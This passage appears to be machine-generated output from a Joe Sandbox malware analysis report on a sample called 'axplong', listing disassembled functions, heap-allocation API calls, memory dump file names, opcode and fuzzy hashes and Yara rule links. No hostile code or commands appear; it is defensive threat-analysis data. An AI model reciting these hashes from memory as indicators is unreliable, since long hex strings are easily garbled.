                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc7fca5e82428a9bc5b380f12c0b0c8c714f8eb5683fc5dd029c1a3fa8dd1f25
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62414DB5900244AFDB24EFB5EC419ABB7FAEF8A304B14442DF556D3210EA30AD05CF64
                                                                                                                                                                                                                                                    Function 006AAB13 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                    • Opcode ID: 38397d586529779180eedcc5d631eb53136d4719006cd02e56cbbe85d5ae4848
                                                                                                                                                                                                                                                    • Instruction ID: fe44e1451eaa83865ed77aac8b31d58df5258073088e7a96844a15abdf5138e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38397d586529779180eedcc5d631eb53136d4719006cd02e56cbbe85d5ae4848
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7111875A0420AAFCB05DF98E9419DA7BF5EF49304F05405AF809AB351D770DD11CB65
                                                                                                                                                                                                                                                    Function 006AD6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,006AA6D3,00000001,00000364,00000006,000000FF,?,0068D32C,F631B7D0,?,006878FB,?), ref: 006AD731
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: d26fe996777e6ac49d5d000b038f2d7e9177ba80c6ee71c64d8a54115748ee1e
                                                                                                                                                                                                                                                    • Instruction ID: ffb425d87bd31218ea188076bfd002e85d9a7d1f6aaf064473c3e6692c7f18f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d26fe996777e6ac49d5d000b038f2d7e9177ba80c6ee71c64d8a54115748ee1e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0E231A06225669B293A229C41A9B7B9BDF837B0B188115FC07ABA81CF20DC015EF0
                                                                                                                                                                                                                                                    Function 006AAF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,F631B7D0,?,?,0068D32C,F631B7D0,?,006878FB,?,?,?,?,?,?,00677435,?), ref: 006AAF3E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: de25343d6d6d413941353c539600f32703b46ec84b4e68d51e995759aff9e54a
                                                                                                                                                                                                                                                    • Instruction ID: b1df2a0983798089ddbd337ac577223f4d3ead15e052ba63ddc62f55458cd5e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de25343d6d6d413941353c539600f32703b46ec84b4e68d51e995759aff9e54a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE0E5716162125FDB6436E59D4179A768F8F433B1F154052AC5592280DB21CC01DDF7
                                                                                                                                                                                                                                                    Function 04B301FF Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 84b07a63e19133920b7a2434c8d91acf7be93411c42b47d2abd4bede56c2f64d
                                                                                                                                                                                                                                                    • Instruction ID: 5620f9bad9072243111201ff307b490b293ca8b2462e73bd9ce8fb2fcd3905d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84b07a63e19133920b7a2434c8d91acf7be93411c42b47d2abd4bede56c2f64d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021A4EB38C410BE7541A5472E54AFABA2DE9D673133080AAF403D550AF2D86F5D7271
                                                                                                                                                                                                                                                    Function 04B30173 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e4c8e15d1e769fcc02cf46663fbfc8fd8424d13e8a0eb86e1a8993a859e73bc9
                                                                                                                                                                                                                                                    • Instruction ID: bf8544618b0b17d7b9cf477ff5b9d23c020f4c12f812f4f419022880f11fefd9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4c8e15d1e769fcc02cf46663fbfc8fd8424d13e8a0eb86e1a8993a859e73bc9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9119FEB38C014BE7542A0472F149FBBA2DE9D673233080AAF403D450AF2986F5D7171
                                                                                                                                                                                                                                                    Function 04B30195 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2b3614309d777399c567999feb5e6c1b133deef2927be9c423cdcf65a44de909
                                                                                                                                                                                                                                                    • Instruction ID: eb798385e56a8d682ca6a08749c82447a52888b2df8c93ed44a4d8fe3c107781
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b3614309d777399c567999feb5e6c1b133deef2927be9c423cdcf65a44de909
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C21F2EA34C010BE7542A1472E14AFABB2EE9D673133080AAF403D154AF2D82F5D7231
                                                                                                                                                                                                                                                    Function 04B3018B Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1ab9c97fcf7f4e6145f1b212d09fb9e16f059b81f5f2182d0467a711fad93f35
                                                                                                                                                                                                                                                    • Instruction ID: 86f14b49c91641d05b938fc0956d4ccd5b2fbd93a9e0e2c9b79236f947d7f7a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ab9c97fcf7f4e6145f1b212d09fb9e16f059b81f5f2182d0467a711fad93f35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6311AEAB38C024BE7542A1472F149FABB2DE9D673233080AAF403D450AF2C86F5D7271
                                                                                                                                                                                                                                                    Function 04B301B7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cded04170c0a08cb985caf39b3b86ed2c592dd108bb98453dfbc8ae3d036ed4a
                                                                                                                                                                                                                                                    • Instruction ID: 17ec33a9cdc6964318d1faeb206cb775abbfce313399ce3b1b34d2d96c871adf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cded04170c0a08cb985caf39b3b86ed2c592dd108bb98453dfbc8ae3d036ed4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9311E4AB38C114BE7541A1876F14AFABB6DE9D673133080AAF403D450AF2D86B5DB271
                                                                                                                                                                                                                                                    Function 04B301F0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
